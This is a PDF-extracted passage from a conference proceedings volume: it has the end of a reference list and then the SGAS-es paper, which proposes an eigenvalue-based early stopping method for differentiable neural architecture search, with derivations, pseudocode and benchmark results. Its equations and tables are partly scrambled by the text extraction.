43. Nguyen, A., Yosinski, J., Clune, J.: Understanding neural networks via feature visualization: a survey. In: Samek, W., Montavon, G., Vedaldi, A., Hansen, L.K., M¨uller, K.-R. (eds.) Explainable AI: Interpreting, Explaining and Visualizing Deep Learning. LNCS (LNAI), vol. 11700, pp. 55–76. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-28954-6 4 44. Erhan, D., Bengio, Y., Courville, A., Vincent, P.: Visualizing higher-layer features of a deep network. University of Montreal, 1341 (2009) 45. Nguyen, A., Clune, J., Bengio, Y., Dosovitskiy, A., Yosinski, J.: Plug & play generative networks: Conditional iterative generation of images in latent space. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 4467–4477 (2017) 46. Mahendran, A., Vedaldi, A.: Understanding deep image representations by inverting them. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 5188–5196 (2015) 47. Nguyen, A., Dosovitskiy, A., Yosinski, J., Brox, T., Clune, J.: Synthesizing the preferred inputs for neurons in neural networks via deep generator networks. In: Advances in Neural Information Processing Systems, pp. 3387–3395 (2016) 48. van den Oord,A., Kalchbrenner, N., Kavukcuoglu, K.: Pixel recurrent neural networks. arXiv preprint arXiv:1601.06759 (2016) 49. Simonyan, K., Vedaldi, A., Zisserman, A.: Deep inside convolutional networks: visualising image classification models and saliency maps. arXiv preprint arXiv:1312.6034 (2013) 50. Khan, J., et al.: Classification and diagnostic prediction of cancers using gene expression profiling and artificial neural networks. Nat. Med. 7(6), 673–679 (2001) ˜ zller, K.-R.: How 51. Baehrens, D., Schroeter, T., Harmeling, S., Kawanabe, M., Hansen, K., MAˇ to explain individual classification decisions. J. Mach. Learn. Res. 11, 1803–1831 (2010) 52. Smilkov, D., Thorat, N., Kim, B., Vi´egas, F., Wattenberg, M.: Smoothgrad: removing noise by adding noise. arXiv preprint arXiv:1706.03825 (2017) 53. Sundararajan, M., Taly, A., Yan., Q.: Axiomatic attribution for deep networks. arXiv preprint arXiv:1703.01365 (2017)
134
R. Kamimura
54. Lapuschkin, S., Binder, A., Montavon, G., Muller, K.-R., Samek, W.: Analyzing classifiers: fisher vectors and deep neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2912–2920 (2016) 55. Arbabzadah, F., Montavon, G., M¨uller, K.-R., Samek, W.: Identifying individual facial expressions by deconstructing a neural network. In: Rosenhahn, B., Andres, B. (eds.) GCPR 2016. LNCS, vol. 9796, pp. 344–354. Springer, Cham (2016). https://doi.org/10.1007/9783-319-45886-1 28 56. Sturm, I., Lapuschkin, S., Samek, W., M¨uller, K.-R.: Interpretable deep neural networks for single-trial EEG classification. J. Neurosci. Methods 274, 141–145 (2016) 57. Binder, A., Montavon, G., Lapuschkin, S., M¨uller, K.-R., Samek, W.: Layer-Wise Relevance Propagation for Neural Networks with Local Renormalization Layers. In: Villa, A.E.P., Masulli, P., Pons Rivero, A.J. (eds.) ICANN 2016. LNCS, vol. 9887, pp. 63–71. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44781-0 8 58. Shimizu, K.: Multivariate Analysis (2009). (in Japanese), Nikkan Kogyo Shinbun
SGAS-es: Avoiding Performance Collapse by Sequential Greedy Architecture Search with the Early Stopping Indicator Shih-Ping Lin and Sheng-De Wang(B) National Taiwan University, Taipei 106319, Taiwan {r09921057,sdwang}@ntu.edu.tw Abstract. Sequential Greedy Architecture Search (SGAS) reduces the discretization loss of Differentiable Architecture Search (DARTS). However, we observed that SGAS may lead to unstable searched results as DARTS. We referred to this problem as the cascade performance collapse issue. Therefore, we proposed Sequential Greedy Architecture Search with the Early Stopping Indicator (SGAS-es). We adopted the early stopping mechanism in each phase of SGAS to stabilize searched results and further improve the searching ability. The early stopping mechanism is based on the relation among Flat Minima, the largest eigenvalue of the Hessian matrix of the loss function, and performance collapse. We devised a mathematical derivation to show the relation between Flat Minima and the largest eigenvalue. The moving averaged largest eigenvalue is used as an early stopping indicator. Finally, we used NAS-Bench-201 and FashionMNIST to confirm the performance and stability of SGAS-es. Moreover, we used EMNIST-Balanced to verify the transferability of searched results. These experiments show that SGAS-es is a robust method and can derive the architecture with good performance and transferability. Keywords: Neural architecture search · Differentiable architecture search · Sequential greedy architecture search · Flat minima · Early stopping · Image classification · Deep learning
1
Introduction
Differentiable Architecture Search (DARTS) [1] vastly reduced the resource requirement of Neural Architecture Search (NAS): using less than 5 GPU days and achieving competitive performance on CIFAR-10, PTB, and ImageNet with only one single 1080Ti. 1.1
Problems of DARTS and SGAS
However, numerous research pointed out that DARTS does not work well. Yang et al. [2] compared several DARTS-based approaches with Random Sampling baseline and found that Random Sampling often gets the better architectures. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 135–154, 2023. https://doi.org/10.1007/978-3-031-28073-3_10
136
S.-P. Lin and S.-D. Wang
Zela et al. [3] delved into this issue and showed that DARTS often gets the architecture full of skip connections. This will lead to performance collapse and make the results of DARTS unstable. Xie et al. [4] attributed these issues to the optimization gap between the encode/decode scheme of DARTS and the original NAS. To solve these problems, P-DARTS [5] and DARTS+ [6] constrained the number of skip connections manually, but this may suffer from a human bias. SmoothDARTS [7] added some perturbation to stabilize DARTS, which may mislead the optimization direction. PC-DARTS [8] used the sampling technique called partial channel connections to forward only partial channels through the operation mixture. This can regularize the effect of skip connections at the early stage. However, if we set the total training epochs from 50 to 200, 400, or even larger, it will still end up with an architecture full of skip connections. Liang et al. [6] called this “the implicit early-stopping scheme”. Performance Collapse Issue. Fig. 1 is a cell which is derived by DARTS on NAS-Bench-201 [9] with CIFAR-10 dataset. It is full of skip connections. The skip connection is an identity mapping without any parameters. Therefore, the searched cell leads to a terrible performance with only about 60% accuracy on the test set, but the best cell can reach 94.37% accuracy. This phenomenon is called performance collapse. One possible explanation of performance collapse is overfitting [3,6]. Since DARTS encodes cells into over-parameterized supergraphs (Fig. 3), operations between every two nodes will have a different number of parameters. That is, operations with parameters like convolution will be trained together with operations with no parameters like skip connection and Zero Operation. At beginning epochs, this is fine because every operation is underfitting and will be improved together. However, when the training epoch becomes larger, operations with parameters start to overfit. Therefore, α values of operations with no parameters will become larger and larger. This is irreversible, and all edges will be selected as skip connections. However, this issue cannot be observed by the validation error of the supernet. Therefore, it is required to use another value as the early stopping indicator. Cascade Performance Collapse Issue. SGAS [10] is a DARTS-based method. The main purpose of SGAS is to reduce the discretization loss of
Fig. 1. Example of performance collapse
SGAS-es
137
Fig. 2. Example of cascade performance collapse
DARTS. It splits the whole searching process of DARTS into multiple phases. However, we observed that SGAS still suffers the instability issue. Figure 2 is an example. We used SGAS on NAS-Bench-201 with the CIFAR-10 dataset. SGAS ended up selecting four edges with the skip connection. That is, performance collapse occurred at nearly every phase of SGAS. This leads to the architecture with test accuracy equal to 88.51%. Although it is already better than DARTS, there is still room for improvement. We call this phenomenon cascade performance collapse. 1.2
Research Purposes and Main Contributions
Our research aims to resolve the instability issue of SGAS. Therefore, the proposed method, SGAS-es, adopts the early stopping indicator proposed by Zela et al. [3] for each phase of SGAS. After doing so, we can stabilize the performance of derived architectures. Besides, it can improve the search ability of SGAS. In this paper, our main contributions are as follows: – Mathematical Derivation: with the sharpness definition proposed by Keskar et al. [11], we showed the relation between Flat Minima of a loss landscape and the largest eigenvalue of the Hessian matrix of the loss function. – Novel Algorithm: we pointed out that SGAS suffered cascade performance collapse issue and proposed SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator, to stabilize architecture search results and derive architectures with better learning ability. – Thorough Experiments: we used NAS-Bench-201 [9], unified NAS benchmarks with three different datasets: CIFAR-10, CIFAR-100, and ImageNet-16-120, to compare SGAS-es with other DARTS-based approaches. We achieved state-of-the-art results on all of them with robust performance. After that, we used DARTS CNN Search Space with the Fashion-MNIST dataset and showed that it could also work on a more complex search space. Finally, by retraining searched cells derived from the Fashion-MNIST dataset on the EMNISTBalanced dataset, we also achieved state-of-the-art performance and showed that architectures searched by SGAS-es have excellent transferability. These experiments confirm that SGAS-es is a generalized approach that can avoid stepping into performance collapse and get suitable architectures.
138
S.-P. Lin and S.-D. Wang
Fig. 3. Encoded Cell Structure. Each Node x(i) is a Latent Representation. Each Edge o(i,j) is an Operation Chosen from Candidate Operations
2 2.1
Prior Knowledge Neural Architecture Search (NAS)
Generally, NAS can be decomposed into three parts [12]: Search Space, Search Strategy, and Performance Estimation Strategy. Search Space is a collection of possible architectures defined by human experts. Since Search Space often contains a great number of elements, Search Strategy is required to pick a potentially well-performed architecture from Search Space. After picking an architecture, Performance Estimation Strategy will tell Search Strategy how the architecture performs. Then Search Strategy can start the next search round. 2.2
Differentiable Architecture Search (DARTS)
DARTS [1] Search Space is a cell-based search space. Cells will be stacked with the fixed pattern to form the supernet architecture. DARTS will only determine architectures inside cells. The supernet architecture is predefined. There are two important steps in DARTS: Continuous Relaxation and Discretization. Continuous Relaxation is to encode the discrete search space via architecture parameters α. DARTS will connect all candidate operations between every two nodes and form a supergraph like Fig. 3, so transformations between nodes x(i) and x(j) will become mixed operations o¯(i,j) (x): o¯(i,j) (x) =
o∈O
) exp(α(i,j) o o ∈O
(i,j)
exp(αo
(i,j)
)
o(x)
(1)
O is the set of candidate operations. αo is the architecture parameter at edge (i, j) corresponding to the operation o. Actually, o¯(i,j) (x) is a weighted sum (i,j) of o(x) weighted by Softmax of αo on edge (i, j).
SGAS-es
139
Discretization is to decode the supergraph to get the final searched cells. Each node in the final searched cells can only have the in-degree equal to 2. Therefore, Discretization can also be viewed as a pruning step. The basic rule of (i,j) pruning is that larger αo indicates the operation o is more important on edge (i, j). Therefore, o will have the larger priority to be picked: (i,j)
o(i,j) = Disc(αo
(i,j)
) = arg max αo o∈O
(2)
The goal of DARTS is as (3). It is a bi-level optimization problem. Given w (α), we want to find the best architecture parameter α , which can minimize the loss computed by Dvalid in the upper-level task. Given α, we want to find the best network parameter w (α), which can minimize the loss computed by Dtrain in the lower-level task. α = arg min L(Dvalid , w (α), α) α
s.t.w (α) = arg min L(Dtrain , w, α)
(3)
w
The whole process of DARTS-based architecture search methods can be divided into two parts: the searching stage and the retraining stage. The goal of the searching stage is to derive the best normal and reduction cell. In the retraining stage, we will stack searched cells derived from the searching stage to form another supernet and train it from scratch. 2.3
Sequential Greedy Architecture Search (SGAS)
SGAS [10] is a DARTS-based method to reduce discretization loss. The significant difference between SGAS and DARTS is in Search Strategy. Rather than discretization at the end of the searching stage, it will pick an edge and fix the operation of that edge per fixed number of epochs. SGAS can reduce the discrepancy between the rank of validation error of the searching stage and the rank of test error of the retraining stage. Therefore, the Kendall rank correlation coefficient between them is closer to 1 than DARTS. In this paper, each phase in SGAS means search epochs between two decision epochs. For example, if eight edges need to be selected in a cell, then there will be nine phases in the searching stage of SGAS. 2.4
ax and Performance The Relation Among Flat Minima, λm α Collapse
Figure 4 shows the relation between these three. This section will explain the first and second relation by [3]. In the Approach part, we will show the mathematical derivation of the third relation.
140
S.-P. Lin and S.-D. Wang
Fig. 4. The relation among flat minima, λmax and performance collapse α ax The Relation between λm and Performance Collapse. Zela et al. [3] α and the test error of derived architecstudied a correlation between λmax α is the largest eigenvalue of ∇2 L(Dvalid , w (α), α ). It is calculated tures. λmax α by a supernet in the searching stage with a randomly sampled mini-batch of Dvalid . After discretization, test error is calculated by supernet after retraining is finished. Zela et al. [3] used four search spaces (S1-S4) with three datasets (12 benchmarks) to provide detailed experiment results. They used 24 different architectures and made the scatter plot on each benchmark to show a strong correlation and test error. between λmax α
The Relation Between Performance Collapse and Flat Minima. Figure 5 shows that the performance drop after discretization at Sharp Minima will be larger than that at Flat Minima. This will lead to performance collapse. Besides, this can also explain why the Kendall rank correlation coefficient is far from 1 in DARTS. To verify this explanation, Zela et al. [3] also plotted correlation between and validation error drop after discretization L(Dvalid , w (αDisc ), αDisc ) − λmax α L(Dvalid , w (α ), α ) and showed that they are truly strongly correlated.
Fig. 5. The role of flat and sharp minima of α in DARTS
SGAS-es
3
141
Approach
3.1
SGAS-es Overview
The main purpose of SGAS is to reduce the discretization loss between the searching and retraining stage. Here we provide the other view of SGAS: it is doing early stopping several times. SGAS will make the edge decision per fixed user-defined decision frequency and fix the operation of the chosen edge. This is a kind of early stopping. After fixing the operation each time, the loss landscape will change, so it can be viewed as another independent subproblem that requires several epochs to reach other local minima. If the decision frequency is too large, each independent subproblem may lead to performance collapse, which we call the cascade performance collapse problem. If the decision frequency is too small, each edge decision is made when the search process is not stable enough. This will make the performance of architectures searched by different random seeds not robust enough. Besides, performance collapse may happen at different epochs depending on the dataset, search spaces, different phases in SGAS, or even different random seeds. To solve these problems, we propose SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator. The primary purpose is to maximize search epochs of each phase in SGAS without stepping into performance collapse. Since search epochs are as large as possible, we expect SGAS-es can have a better ability to search architectures with good performance and derive more stable results for each independent run. Besides, we tend to do the discretization in relatively flat places. This can further reduce the discretization loss and let results have better robustness. There are four major functions in SGAS-es. We will introduce them in the following four subsections. 3.2
Bilevel Optimization
To solve (3) by Gradient Descent, one will have to calculate the total derivative of L(Dvalid , w (α), α). Liu et al. [1] used Chain Rule, One-step Update [14], and Finite Difference Approximation then got (4) where is a small scalar. dL(Dvalid ,w (α),α) dα
= ∇α L(Dvalid , w (α), α) − ξ
∇α L(Dtrain ,w+ ,α)−∇α L(Dtrain ,w− ,α) 2
(4)
ξ is a user-defined learning rate. When ξ > 0, it is called “Second-order Approximation”. In contrast, “First-order Approximation” is when ξ = 0. Although Liu et al. [1] showed that searching by First-order Approximation has a worse result than by Second-order Approximation empirically, First-order Approximation is about twice faster as Second-order Approximation. Besides, lots of follow-up DARTS-based approaches such as P-DARTS [5], PC-DARTS [8], SGAS [10], Fair DARTS [13] used First-order Approximation and reached the state-of-the-art results with less searching time. As a result, we decided to use First-order Approximation.
142
S.-P. Lin and S.-D. Wang
Algorithm 1 is for search and validation per each epoch. We will first update architecture parameters α and network weights w by the validation data Dvalid and the train data Dtrain using Mini-batch Gradient Descent. Then we will calculate the validation performance of the architecture of this epoch.
Algorithm 1: Search valid func Input : Dtrain : The train data, Dvalid : The validation data, arch: The architecture parameterized by α and w which we want to search, ηα , ηw : Learning rates of α and w Output: valid perf ormance: The validation performance of arch this epoch, arch 1 2 3 4 5 6 7 8 9
3.3
for (batchtrain , batchvalid ) in (Dtrain , Dvalid ) do α ← α − ηα ∇α L(batchvalid , w, α); w ← w − ηw ∇w L(batchtrain , w, α); end Initialize valid perf ormance; for batchvalid in Dvalid do Update valid perf ormance by batchvalid ; end return valid perf ormance, arch
Early Stopping Indicator
In this section, we will first prove the third relation in Fig. 4. Here we adopted the sharpness definition proposed by Keskar et al. [11]. Given architecture parameters α ∈ Rn , a loss function L and a small constant , the sharpness of α on a loss landscape can be defined as follow: φ(α , L, ) = (maxz∈C L(α + z)) − L(α )
(5)
Equation (6) is the definition of C . C is a box which is a collection of z vectors. Each element zi in z is a delta value along i-th dimension. C = {z ∈ Rn : − ≤ zi ≤ ∀i ∈ {1, 2, 3, ..., n}}
(6)
Let α∗ = α + z, L(α∗ ) can be approximated by Taylor Series where g = ∇L(α ) and H = ∇2 L(α ): L(α∗ ) ≈ L(α ) + (α∗ − α )T g + 12 (α∗ − α )T H(α∗ − α ) = L(α ) + z T g + 12 z T Hz
(7)
SGAS-es
143
Assume that α is a critical point: L(α∗ ) ≈ L(α ) + 12 z T Hz
(8)
Substituting (8) into (5), the sharpness of α will be: φ(α , L, ) ≈ 12 (maxz∈C z T Hz)
(9)
Since H is an n × n symmetric matrix, H will have n eigenvectors {v1 , v2 , ..., vn } forming an orthonormal basis of Rn such that: n n z = i=1 ai vi where z2 = i=1 a2i (10) Substituting (10) into (9) will get: n φ(α , L, ) ≈ 12 max( i=1 a2i λi )
(11)
λi are eigenvalues corresponding to vi . Let λ1 ≥ λ2 ≥ λ3 ≥ ... ≥ λn : n 2 2 i=1 ai λi ≤ λ1 z
(12)
Assume that is small enough such that all z are nearly the same: n max( i=1 a2i λi ) = λ1 z2
(13)
Finally, the sharpness of α will be: φ(α , L, ) ≈ 12 λ1 z2
(14)
Therefore, the sharpness will be related to the largest eigenvalue of ∇2 L(α ). . We denote the largest eigenvalue of ∇2 L(α ) calculated via Dvalid by λmax α will lead to a larger test We have shown all relations in Fig. 4: larger λmax α values can be viewed error in DARTS and indicate the sharper minima, so λmax α as a better indicator of performance collapse than a supernet validation error. We adopt the early stopping indicator proposed by Zela et al. [3]. The goal value from exploding: is to prevent λmax α ¯ max (i−k) λ α ¯ max (i) λ α
< T hreshold
(15)
¯ max (i) is the average λmax from the current epoch i to the previous epoch λ α α i − w + 1. w is the window size. k is the constant. To prevent the explosion of ¯ max (i−k) divided by λ ¯ max (i) smaller than T , we will stop the searching , if λ λmax α α α of this phase, return the searching to epoch i − k and do the edge decision. Algorithm 2 is the early stopping indicator. We will use a FIFO buffer of this epoch and previous epochs. window ev with a size of w to store λmax α ¯ max (·) in (15). After window ev avg is a dictionary playing the same role as λ α storing the mean of values in window ev into window ev avg[epoch], we will check if it meets the early stopping condition or not. If so, stop will be True.
144
S.-P. Lin and S.-D. Wang
Algorithm 2: Indicator Input : epoch: The current epoch, prev stop epoch: The epoch when the previous early stopping occurs, w, k, T , Dtrain , Dvalid , arch Output: stop: If doing the early stopping or not, stop epoch: The epoch to return 1 2 3 4 5 6 7 8 9 10 11 12
3.4
Calculate λmax using Dtrain , Dvalid , arch; α Push λmax into the back of window ev; α if the length of window ev > w then Pop a value from the front of window ev; end stop ← False; stop epoch ← epoch − k; window ev avg[epoch] ←Mean(window ev); ev avg[stop epoch] if stop epoch >= prev stop epoch and window < T then window ev avg[epoch] stop ←True; end return stop, stop epoch
Edge Decision Strategy
When searching meets the early stopping condition, the edge decision strategy is used to pick the edge to fix the operation of that edge. This kind of greedy decision can reduce the discretization loss compared to DARTS. Besides, we try to do the discretization at a flat minima each time, so we expect a lower discretization loss than the original SGAS. We followed the edge decision strategy proposed by Li et al. [10]. There are two major criteria: Non-Zero Operations Proportion and Edge Entropy. Non-Zero Operations Proportion. Zero Operation (or called None Operation) indicates the edge has no operation. For the edge with the less proportion (i,j) (i,j) of Zero Operation, i.e. has the less value of exp(αzero )/ o∈O exp(αo ) where (i,j) αzero is the architecture parameter of Zero Operation of edge (i, j), we assume that this edge is more important. Therefore, we used the proportion of Non-Zero Operations to evaluate the importance of the edge. The larger the EI (i,j) is, the more possible the edge (i, j) will be selected. EI (i,j) = 1 −
exp(α(i,j) zero ) o ∈O
(i,j)
exp(αo
(16)
)
(i,j)
Edge Entropy. Consider the probability mass function of αo is defined as follow: (i,j)
P (αo
)=
EI (i,j)
(i,j) exp(αo ) (i,j) , o exp(α ) o ∈O o
(i,j)
where P (αo
∈ O, o = zero
)
(17)
SGAS-es
145
Algorithm 3: Edge decision Input : arch Output: edge index: The index of the selected edge 1
5
Calculate EI of each edge (i, j) by (16); (i,j) (i,j) Calculate P (αo ) of every αo by (17); Calculate SC of each edge (i, j) by (18); Calculate Score of each edge (i, j) by (19); edge index ← arg max Score(i,j) ;
6
return edge index
2 3 4
(i,j)
Algorithm 4: Fix operation Input : batch size: The current batch size, batch increase: The value to increase the batch size each time, arch, edge index, Dtrain , Dvalid Output: new batch size: The new batch size after increasing, arch, Dtrain , Dvalid 1 2 3 4
Turn off the gradient calculation of α[edge index]; new batch size ← batch size + batch increase; Reload Dtrain and Dvalid with the new batch size; return new batch size, arch, Dtrain , Dvalid
The larger normalized Shannon entropy is, the more uncertainly the decision is made. Therefore, we used the complement of normalized Shannon entropy as the measure of the decision certainty of the given edge (i, j). SC (i,j) = 1 −
−
(i,j)
(i,j)
P (αo ) log(P (αo log(|O|−1)
o ∈O,o =zero
))
(18)
Finally, the total score of the edge (i, j) is defined as follows: Score(i,j) = normalize(EI (i,j) ) × normalize(SC (i,j) )
(19)
where normalize(·) means normalizing values of all edges in the single cell. Given the architecture, Algorithm 3 is for edge decision. It will calculate scores of all edges and pick the edge with the maximum score. 3.5
Fixing the Operation
After making the edge decision each time, we will fix the operation of the chosen edge. That is, (1) will be degenerated to: o¯(i,j) (x) = o(i,j) (x) where o(i,j) (x) is derived from (2).
(20)
146
S.-P. Lin and S.-D. Wang
Fig. 6. Illustration of SGAS-es
As shown in Algorithm 4, since the mixed operation becomes the fixed operation, we can turn off the gradient calculation of α of that edge. This can reduce memory usage. Therefore, we can increase the batch size each time after the edge decision. The larger batch size can stabilize and accelerate the search procedure. 3.6
Put-It-All-Together: SGAS-es
The whole algorithm of SGAS-es is shown in Algorithm 5. For each epoch, the Search valid func function will do the Forward and Back Propagation via First-order Approximation and return the validation performance. Second, the of this epoch and determine whether it is Indicator function will evaluate λmax α time to do Early Stopping. If it is time to do Early Stopping or accumulated epochs of this phase have already reached the default decision frequency, we have to replace the current architecture with the architecture corresponding to stop epoch, make the edge decision, and fix the operation of the edge chosen by Edge decision function. Finally, we will judge whether all edges have been chosen or not. If so, we will break the loop and end the searching procedure. If not, we will go to the next epoch and repeat the above-mentioned steps. Figure 6 illustrates the proposed search algorithm of SGAS-es with a sequence of an initial epoch followed by repeated decision epochs. Extra hyperparameters are required to control the early stopping indicator rather than SGAS. These hyperparameters are: window size w, constant k, and threshold T . One may question how to set these hyperparameters. We use the same hyperparameters throughout all experiments and show that with these settings, we can have robust and good results: df is 15, w is 3, k is 5, and T is 1.3.
SGAS-es
147
Algorithm 5: SGAS-es Input : m: The maximum number of epochs to search (= df × total edges), df : The default decision frequency, ηα , ηw , w, k, T , batch size, batch increase Output: arch 1 2 3 4 5 6 7 8 9 10 11 12 13 14
15 16 17 18 19 20
4 4.1
prev stop epoch ← 1; Initialize arch; Load Dtrain and Dvalid with the batch size; for epoch ← 1 to m do valid perf ormance, arch ← Search valid func(Dtrain , Dvalid , arch, ηα , ηw ); stop, stop epoch ← Indicator(epoch, prev stop epoch, w, k, T, Dtrain , Dvalid , arch); if stop or (epoch − prev stop epoch) is df then if stop then arch ← Load prev arch(stop epoch); epoch ← stop epoch; end prev stop epoch ← epoch; edge index ← Edge decision(arch); batch size, arch, Dtrain , Dvalid ← Fix operation(batch size, batch increase, arch, edge index); if all edges are selected then break; end end end return arch
Experiment NAS-Bench-201
NAS-Bench-201 [9] (or called NATS-Bench Topology Search Space [15]) fixed all factors of the searching and retraining pipe, such as hyperparameters, traintest split settings, data augmentation tricks, and the search space, to provide a fair comparison among all NAS algorithms. It includes three datasets: CIFAR10, CIFAR-100, and ImageNet-16-120 [16] which is the down-sampled version of ImageNet. They are all classic RGB image classification datasets with a different number of classes and samples. For more detailed settings, please refer to NASBench-201 paper.
148
S.-P. Lin and S.-D. Wang Table 1. Results of SGAS-es on NAS-Bench-201
Search space
Methods
Topology RSPS Search Space DARTS (1st ) DARTS (2nd ) GDAS SETN ENAS SGAS SGAS-es Optimal
CIFAR-10 Validation
Test
CIFAR-100 Validation
Test
ImageNet-16-120 Validation Test
87.60 ± 0.61 49.27 ± 13.44 58.78 ± 13.44 89.68 ± 0.72 90.00 ± 0.97 90.20 ± 0.00 85.06 ± 0.00 91.40 ± 0.04 91.61
91.05 ± 0.66 59.84 ± 7.84 65.38 ± 7.84 93.23 ± 0.58 92.72 ± 0.73 93.76 ± 0.00 88.33 ± 0.03 94.20 ± 0.02 94.37 (94.37)
68.27 ± 0.72 61.08 ± 4.37 59.48 ± 5.13 68.35 ± 2.71 69.19 ± 1.42 70.21 ± 0.71 70.80 ± 0.65 73.18 ± 0.10 73.49
68.26 ± 0.96 61.26 ± 4.43 60.49 ± 4.95 68.17 ± 2.50 69.36 ± 1.72 70.67 ± 0.62 70.76 ± 1.29 73.27 ± 0.03 73.51 (73.51)
39.73 ± 0.34 38.07 ± 2.90 37.56 ± 7.10 39.55 ± 0.00 39.77 ± 0.33 40.78 ± 0.00 42.97 ± 20.53 45.61 ± 0.13 46.73
40.69 ± 0.36 37.88 ± 2.91 36.79 ± 7.59 39.40 ± 0.00 39.51 ± 0.33 41.44 ± 0.00 43.04 ± 20.76 46.19 ± 0.04 46.20 (47.31)
Fig. 7. Searched cell of SGAS-es on NAS-Bench-201 with CIFAR-10
As shown in Table 1, SGAS-es reached state-of-the-art performance on all datasets in NAS-Bench-201. Compared to searched cells of DARTS (Fig. 1) and SGAS (Fig. 2), SGAS-es (Fig. 7) is able to gain searched cells without performance collapse or cascade performance collapse. Therefore, these searched cells are more learnable and lead to better accuracy. Besides, we ran the searching procedure three times with three different random seeds on all datasets and showed their mean accuracy ± variance. Variances are close to 0, so we can get stable results with SGAS-es. 4.2
Fashion-MNIST Dataset
Fashion-MNIST [17] is also an image classification dataset with 70000 28 × 28 gray-scale images. These images are separated into ten classes such as dress, coat, sneaker, and T-shirt. There are 60000 images in the train set and 10000 in the test set. Compared to MNIST (the handwritten digits dataset [18]), FashionMNIST is more complex and, therefore, more discriminating. In this experiment, we use DARTS CNN Search Space [1]. However, we reduce the number of candidate operations from eight to five. According to StacNAS [19], these eight operations can be separated into four groups: skip connect; avg pool 3 × 3 and max pool 3 × 3; sep conv 3 × 3 and sep conv 5 × 5; dil conv 3 × 3 and dil conv 5 × 5.
SGAS-es
149
Table 2. Results of SGAS-es on fashion-MNIST Methods
Accuracy (%) Params (MB) Search method
WRN-28-10 + random erasing [21] DeepCaps [22] VGG8B [23]
95.92 94.46 95.47
37 7.2 7.3
Manual Manual Manual
DARTS (1st ) + cutout + random erasing DARTS (2nd ) + cutout + random erasing PC-DARTS + cutout + random erasing SGAS + cutout + random erasing SGAS-es + cutout + random erasing (Best) SGAS-es + cutout + random erasing
96.14 ± 0.04 96.14 ± 0.13 96.22 ± 0.06 96.22 ± 0.24 96.37 ± 0.07 96.45
2.25 2.31 2.81 3.47 3.34 3.7
Gradient-based Gradient-based Gradient-based Gradient-based Gradient-based Gradient-based
Fig. 8. Normal Cells Searched by DARTS (1st ), DARTS (2nd ), SGAS, and SGAS-es on Fashion-MNIST
Operations in each group are correlated with each other. Therefore, the original DARTS CNN search space has the Multi-Collinearity problem, which may mislead the search result. Also, DLWAS [20] pointed out that in some cases, convolution with a 5 × 5 kernel size can be replaced by convolution with a 3 × 3 kernel size. Besides, the latter costs fewer parameters. As a result, we pruned candidate operations from eight to five to avoid the Multi-collinearity problem and reduce the sizes of derived models. This can also reduce memory usage while searching. Five candidate operations are: Zero Operation, skip connect, max pool 3 × 3, sep conv 3 × 3, and dil conv 3 × 3. For more detailed settings of this experiment, please refer to Appendix A. According to Table 2, DARTS-based methods can easily perform better than architectures designed by human experts. Besides, SGAS-es can reach the best accuracy with 96.45%. Like the NAS-Bench-201 experiment, we ran the searching procedure with three different random seeds and retrained these architectures to verify the stability of SGAS-es. Results are reported by mean accuracy ± standard deviation. As we can see, SGAS-es has excellent stability, which can robustly outperform other methods.
150
S.-P. Lin and S.-D. Wang Table 3. Results of SGAS-es on EMNIST-Balanced
Methods
Accuracy (%) Params (MB) Search method
WaveMix-128/7 [25] VGG-5 (Spinal FC) [26] TextCaps [27]
91.06 91.05 90.46
2.4 3.63 5.87
Manual Manual Manual
DARTS (1st ) + random affine DARTS (2nd ) + random affine SGAS + random affine SGAS-es + random affine (Best) SGAS-es + random affine
91.06 ± 0.11 91.14 ± 0.2 91.12 ± 0.04 91.25 ± 0.11 91.36
2.25 2.31 3.47 3.34 3.03
Gradient-based Gradient-based Gradient-based Gradient-based Gradient-based
Finally, we drew normal cells derived by DARTS (1st and 2nd order), SGAS, and SGAS-es (Fig. 8). Compared to DARTS, SGAS-es prevented performance collapse. Interestingly, although SGAS did not suffer cascade performance collapse in this experiment, it derived the cell with the worst performance compared to SGAS-es and even DARTS: only 95.95% test accuracy. We suppose this is due to the instability issue caused by the edge decision of each phase made when training is not stable enough. This is also reflected in the standard deviation of SGAS: 0.24, which is the largest among these methods. 4.3
EMNIST-Balanced Dataset
EMNIST [24] is the extension of MNIST with handwritten letters. Each sample is a 28 × 28 grayscale image. There are six kinds of split methods in EMNIST: Byclass, Bymerge, Letters, Digits, Balanced, and MNIST, so there are six benchmarks in EMNIST. Here, we use EMNIST-Balanced because our primary purpose is to compare SGAS-es with other DARTS-based algorithms, not to deal with the imbalanced dataset (EMNIST-Bymerge and EMNIST-Byclass). Besides, among balanced datasets (EMNIST-Letters, EMNIST-Digits, EMNIST-Balanced, and MNIST), EMNIST-Balanced is the most difficult: with only 131600 samples but 47 classes. The number of samples in the train set is 112800, and that in the test set is 18800. As reported in [25], it has the lowest state-of-the-art accuracy with 91.06%. Therefore, we use EMNIST-Balanced to evaluate the performance of DARTS-based algorithms further. In this experiment, we used cells derived from Fashion-MNIST and retrained them on EMNIST-Balanced from scratch. The primary purpose is to test the transferability of these cells. Liu et al. also did this experiment, deriving cells from an easier dataset and retraining them on a more difficult dataset, in DARTS paper [1]. Therefore, this experiment will only include the retraining stage. For more detailed settings of this experiment, please refer to Appendix B.
SGAS-es
151
According to Table 3, we achieve the state-of-the-art accuracy, 91.36%, on the EMNIST-Balanced dataset, which is higher than the current state-of-theart, WaveMix-128/7 with 91.06%. Besides, cells derived by SGAS-es have good transferability with a mean accuracy equal to 91.25% which is the best among these DARTS-based approaches. The interesting point is that the best cell of SGAS-es on Fashion-MNIST is not the best on EMNIST-Balanced. As reported in DARTS paper [1], Liu et al. used the best cell searched on the smaller dataset to retrain it on the larger dataset. However, this may not be the best result. Therefore, it is an interesting research topic to make the rank of cells on smaller datasets and the rank of cells on larger datasets more similar.
5
Conclusion
